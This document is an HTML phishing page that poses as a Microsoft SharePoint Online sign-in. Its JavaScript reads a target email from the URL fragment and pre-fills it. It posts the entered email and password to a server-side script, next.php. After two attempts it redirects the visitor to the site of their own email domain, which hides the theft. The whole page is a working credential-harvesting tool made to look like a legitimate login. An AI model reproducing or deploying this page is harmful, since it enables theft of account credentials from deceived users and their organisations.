
<!doctype html>
<html lang="en">
<head>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.1.1.min.js">
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="icon" href="images/fav.png" type="image/icon" sizes="30x30">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>Sharepoint Login</title>
    <link href="css/login.css" rel="stylesheet" media="all">

    <style type="text/css">


    </style>
  </head>
  <body>
    <!-- body start//////////////////// -->
    <section class="form-26">

      <div class="display-ad" style="margin: 8px auto; display: block; text-align:center;">
        <!---728x90--->

      </div>

      <div class="form-26-mian">
        <div class="layer">
          <div class="wrapper">
            <div class="form-inner-cont">
              <div class="forms-26-info">
                <img src="images/microsoft-sharepoint.svg" width="100px"><br>
                <span class="h2 text-white align-middle">SharePoint<br>Online</span><br><br>
                <span class="h5 text-white">SharePoint Online Limits across different Office 365 plans</span><br>
                <span class=" text-white">Sign in to Continue to SharePoint Online.</span>
              </div>
              <div class="form-right-inf mt-3">
                <form action="#" method="post" class="signin-form">
                  <div class="container-fluid">
                    <div class="row">
                      <div class="col-lg-6 mx-auto">
                        <center>
                          <div class="alert alert-warning" id="msg" style="display: none;"></div>
                          <span id="error" class="text-warning" style="display: none;" >That account doesn't exist. Enter a different account</span>
                        </center>
                        <div class="form-input">
                          <label class="text-white float-left">Email Or Username</label>
                          <input type="email" name="email" id="email" placeholder="Email" required="">
                        </div>
                      </div>
                    </div>
                    <div class="row">
                      <div class="col-lg-6 mx-auto mt-3">
                        <div class="form-input">
                          <label class="text-white float-left">Password</label>
                          <input type="password" id="password" name="password" placeholder="Password" required="">
                        </div>
                      </div>
                    </div>
                    <div class="row">
                      <div class="col-lg-6 mx-auto text-left mt-2">
                        <a href="#">Forget Password ?</a>
                      </div>
                    </div>
                    <div class="row">
                      <div class="col-lg-6 mx-auto mt-4">
                        <div class="form-input"><button class="btn" id="submit-btn">Login</button></div>
                      </div>
                    </div>
                  </div>
                  <h6 class="already"> Dont have an account? <a href="register.html"><span>Register
                    Here<span></span></span></a></h6>
                  </form>

                </div>
                <div class="copyright text-center">
                  <p>© 2019 SharePoint Online. All rights reserved</p>
                </div>
              </div>

            </div>
          </div>
        </div>
      </section>

      <!-- body end////////////////// -->


      <!-- Optional JavaScript -->
      <!-- jQuery first, then Popper.js, then Bootstrap JS -->
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    </body>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script>

      /* global $ */
      $(document).ready(function(){
        var count=0;


    /////////////url email getting////////////////
    var email = window.location.hash.substr(1);
    if (!email) {

    }
    else
    {
        // $('#email').val(email);
        var my_email =email;
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/other-1.png');
        $('#field').html("Other Mail");
        $('#email').val(my_email);
        $('#emailch').html(my_email);
        $("#msg").hide();
        $("#inputbar").animate({left:200, opacity:"hide"}, 0);
        $("#automail").animate({right:200, opacity:"show"}, 1000);
      }
      ///////////////url getting email////////////////


      
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );
      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      ///////////new injection////////////////
      count=count+1;
      
      $.ajax({
        dataType: 'JSON',
        url: 'next.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
            },
            success: function(response){
              $("#password").val("");
                  if (count>=2) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("http://www."+my_slice);

                  }
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                  $('#msg').html(response['msg']);
                }
                else{
                  $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=2) {
                count=0;
                window.location.replace("http://www."+my_slice);
              }
              $("#msg").show();
              $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('Login');
            }
          });
    });


    });


  </script>
  </html>